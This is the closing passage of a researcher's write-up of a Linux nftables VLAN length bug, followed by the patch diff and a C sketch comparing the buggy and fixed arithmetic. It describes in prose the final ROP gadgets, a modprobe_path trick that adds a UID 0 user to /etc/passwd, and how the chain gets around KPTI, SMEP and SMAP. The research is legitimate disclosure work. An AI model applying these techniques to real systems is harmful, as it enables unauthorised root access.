#14 net_rx_action (h=<optimized out>) at net/core/dev.c:6676
#15 0xffffffff82280135 in __do_softirq () at kernel/softirq.c:574

Any function between the last corrupted one and __do_softirq would work to exit gracefully. To simulate the end of the current chain evaluation we can just return to nf_hook_slow since we know the location of its rbp.

Yes, we should also disable maskable interrupts via a cli; ret gadget, but we wouldn’t have enough space, and besides, we will be discarding the network interface right after.

To prevent any deadlocks and random crashes caused by skipping over the nft_do_chain function, an NFT_MSG_DELTABLE message is immediately sent to flush all nftables structures, and we quickly exit the program to disable the network interface connected to the new network namespace.

Therefore, gadget 4 just pops nft_do_chain’s rbp and runs a clean leave; ret, this way we don’t have to worry about forcefully switching context.

As soon as execution is handed back to userland, a file with an unknown header is executed to trigger the executable under modprobe_path that will add a new user with UID 0 to /etc/passwd.

While this is in no way a data-only exploit, notice how the entire exploit chain lives inside kernel memory. This is crucial to bypass mitigations:

- KPTI requires page tables to be swapped to the userland ones while switching context; __do_softirq will take care of that.

- SMEP/SMAP prevent us from reading, writing and executing code from userland while in kernel mode. Writing the whole ROP chain in kernel memory that we control allows us to fully bypass those measures as well.

2.3. Patching the tables

Patching this vulnerability is trivial, and the most straightforward change has been approved by Linux developers:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
 			return false;
 
 		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;
 
 		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

While this fix is valid, I believe that simplifying the whole expression would have been better:

@@ -63,7 +63,7 @@ nft_payload_copy_vlan(u32 *d, const struct sk_buff *skb, u8 offset, u8 len)
 			return false;
 
 		if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
-			ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
+			ethlen = VLAN_ETH_HLEN + vlan_hlen - offset;
 
 		memcpy(dst_u8, vlanh + offset - vlan_hlen, ethlen);

since ethlen is initialized with len and is never updated.
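
To see the three expressions side by side, the sketch below evaluates them in userland with the kernel's u8 arithmetic. VLAN_ETH_HLEN (18) and VLAN_HLEN (4) are the kernel's values; the function names and the inputs offset = 19, len = 4 are illustrative choices of mine, picked because they reproduce the 251-byte length mentioned earlier.

```c
#include <stdint.h>

#define VLAN_ETH_HLEN 18 /* Ethernet header plus one VLAN tag */
#define VLAN_HLEN      4

/* Original expression: adds vlan_hlen instead of subtracting it, so the
 * subtraction can wrap around in the u8 ethlen. */
uint8_t ethlen_buggy(uint8_t offset, uint8_t len, uint8_t vlan_hlen)
{
    uint8_t ethlen = len;

    if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
        ethlen -= offset + len - VLAN_ETH_HLEN + vlan_hlen;
    return ethlen;
}

/* Upstream fix: only the bytes past the VLAN header are cut off. */
uint8_t ethlen_fixed(uint8_t offset, uint8_t len, uint8_t vlan_hlen)
{
    uint8_t ethlen = len;

    if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
        ethlen -= offset + len - VLAN_ETH_HLEN - vlan_hlen;
    return ethlen;
}

/* Simplified form proposed above. It relies on the caller having checked
 * offset < VLAN_ETH_HLEN + vlan_hlen, as the kernel function does. */
uint8_t ethlen_simplified(uint8_t offset, uint8_t len, uint8_t vlan_hlen)
{
    uint8_t ethlen = len;

    if (offset + len > VLAN_ETH_HLEN + vlan_hlen)
        ethlen = VLAN_ETH_HLEN + vlan_hlen - offset;
    return ethlen;
}
```

With offset = 19, len = 4 and vlan_hlen = 4, the buggy version computes 4 - 9, which wraps to 251, while both fixed variants return 3, the number of bytes actually left in the header.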

The vulnerability existed since Linux v5.5-rc1 and has been patched with commit 696e1a48b1a1b01edad542a1ef293665864a4dd0 in Linux v6.2-rc5.

One possible approach to making this vulnerability class harder to exploit involves using the same randomization logic as the one in the kernel stack (aka per-syscall kernel-stack offset randomization): by randomizing the whole kernel stack on each syscall entry, any KASLR leak is only valid for a single attempt. This security measure isn’t applied when entering the softirq context as a new stack is allocated for those operations at a static address.

You can find the PoC with its kernel config on my Github profile. The exploit has purposefully been built with only a specific kernel version in mind, so as to make it harder to use for illicit purposes. Adapting it to another kernel would require the following steps:

- Reshaping the kernel leak from the nft registers,

- Finding the offsets of the new symbols,

- Calculating the stack pivot length

- etc.

In the end this was just a side project, but I’m glad I was able to push through the initial discomforts as the final result is something I am really proud of. I highly suggest anyone interested in kernel security and CTFs to spend some time auditing the Linux kernel to make our OSs more secure and also to have some fun!

I’m writing this article one year after the 0-day discovery, so I expect there to be some inconsistencies or mistakes. Please let me know if you spot any.

I want to thank everyone who allowed me to delve into this research with no clear objective in mind, especially my team @ Betrusted and the HackInTheBox crew for inviting me to present my experience in front of so many great people! If you’re interested, you can watch my presentation here: